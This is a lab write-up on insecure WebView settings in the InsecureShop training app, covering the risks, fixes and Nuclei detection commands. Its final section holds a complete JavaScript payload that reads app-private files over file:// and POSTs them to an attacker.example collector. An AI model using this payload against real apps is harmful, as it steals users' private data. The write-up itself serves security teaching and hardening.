Insecure Webview Properties Enabled


Last updated 3 years ago


The activities com.insecureshop.WebViewActivity, com.insecureshop.WebView2Activity and com.insecureshop.PrivateActivity have the following insecure WebView properties enabled:

settings.setJavaScriptEnabled(true);
settings.setAllowUniversalAccessFromFileURLs(true);

The property setAllowUniversalAccessFromFileURLs allows JavaScript running in a document loaded over the file:// scheme to read the content of any other local file, and also any document reachable through other schemes such as http(s)://. This is a violation of the Same Origin Policy: an attacker who can get the WebView to render a file:// page under their control can both steal the user's data (app-private files are readable, because the WebView runs inside the app's own sandbox) and interact with Internet services on behalf of the application. The setting already defaults to false on API level 16 (Jelly Bean) and above and is deprecated since API level 30, so an app that has it enabled has opted in explicitly; the fix is to leave it (and setAllowFileAccessFromFileURLs) at false, and to call setAllowFileAccess(false) unless loading file:// content is genuinely required.

The second property, setJavaScriptEnabled, allows JavaScript to execute in the context of the WebView. If the content is loaded over plain HTTP, or the app's certificate validation is broken (see the Lack of SSL Certificate Validation challenge), an attacker performing a man-in-the-middle (MitM) attack or tampering with a server response can inject and execute arbitrary JavaScript. On its own this leads to information leakage; it becomes remote code execution in specific scenarios, for example when the WebView also exposes a JavaScript bridge through addJavascriptInterface.

You can use the Nuclei templates webview-javascript.yaml and webview-universal-access.yaml (from the file/android/ directory of nuclei-templates) on the apktool-decoded output of an Android app to identify these insecure WebView setter calls:

echo /output_apktool/ | nuclei -t /file/android/webview-javascript.yaml
echo /output_apktool/ | nuclei -t /file/android/webview-universal-access.yaml

Exploitation (!!SPOILER!!)

The following video shows that, by abusing the WebView property setAllowUniversalAccessFromFileURLs, we are able to exfiltrate the InsecureShop application's local storage data to a remote domain under the attacker's control.

(Note: in the following video, this vulnerability was chained with the finding Insecure Broadcast Receiver.)
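The kind of payload the exploitation above relies on, written here as an added example that is not InsecureShop's code nor the author's: it is the script body of an HTML page that the attacker gets the vulnerable WebView to load over file:// (how that page is delivered, e.g. through the chained finding, is assumed and not shown). It works only because the WebView has both setJavaScriptEnabled(true) and setAllowUniversalAccessFromFileURLs(true). The target file paths, the package-data layout and the collector URL are assumptions for illustration, and the XHR constructor is injectable so the read-and-collect logic can be exercised outside a WebView.

```javascript
// Added example, not code from InsecureShop. Assumes a WebView with
// setJavaScriptEnabled(true) and setAllowUniversalAccessFromFileURLs(true)
// has rendered this script from a file:// URL.

// Assumed locations of app-private data (illustrative, adjust to the real layout).
const TARGET_FILES = [
  "file:///data/data/com.insecureshop/shared_prefs/Prefs.xml",
  "file:///data/data/com.insecureshop/databases/insecureshop.db",
];

// Assumed attacker-controlled collector endpoint.
const COLLECTOR_URL = "https://attacker.example/collect";

// Read one local file with a synchronous XHR. From a file:// origin this only
// succeeds because allowUniversalAccessFromFileURLs relaxes the same-origin policy.
// `XHR` is the XMLHttpRequest constructor, passed in so it can be faked in tests.
function readLocalFile(url, XHR) {
  const xhr = new XHR();
  try {
    xhr.open("GET", url, false);
    xhr.send(null);
  } catch (e) {
    // Some unreadable paths raise on send(); treat that as "not readable".
    return null;
  }
  // Responses for file:// URLs report status 0 even on success, so decide on
  // the body rather than on xhr.status.
  const body = xhr.responseText;
  return body && body.length > 0 ? body : null;
}

// Collect every readable target into a path -> contents map.
function collectLoot(paths, XHR) {
  const loot = {};
  for (const path of paths) {
    const contents = readLocalFile(path, XHR);
    if (contents !== null) loot[path] = contents;
  }
  return loot;
}

// Serialise the loot as the JSON body that gets POSTed to the collector.
function buildExfilBody(loot) {
  return JSON.stringify({ files: loot });
}

// Ship the loot. The cross-origin POST is permitted for the same reason the
// file reads are: the file:// origin has been granted universal access.
function exfiltrate(collectorUrl, loot, XHR) {
  const xhr = new XHR();
  xhr.open("POST", collectorUrl, true);
  xhr.send(buildExfilBody(loot));
}

// Entry point when actually rendered inside the WebView.
if (typeof document !== "undefined" && typeof XMLHttpRequest !== "undefined") {
  const loot = collectLoot(TARGET_FILES, XMLHttpRequest);
  if (Object.keys(loot).length > 0) exfiltrate(COLLECTOR_URL, loot, XMLHttpRequest);
}
```

The status-0 check is the detail that trips people up when testing this by hand: a file:// response that succeeded looks like a failure if you test xhr.status, so the payload keys on the response body instead. With the hardened settings described above (universal and file-URL access left at their false defaults), the same script renders but every XHR to file:// is refused by the same-origin policy, and collectLoot returns an empty map.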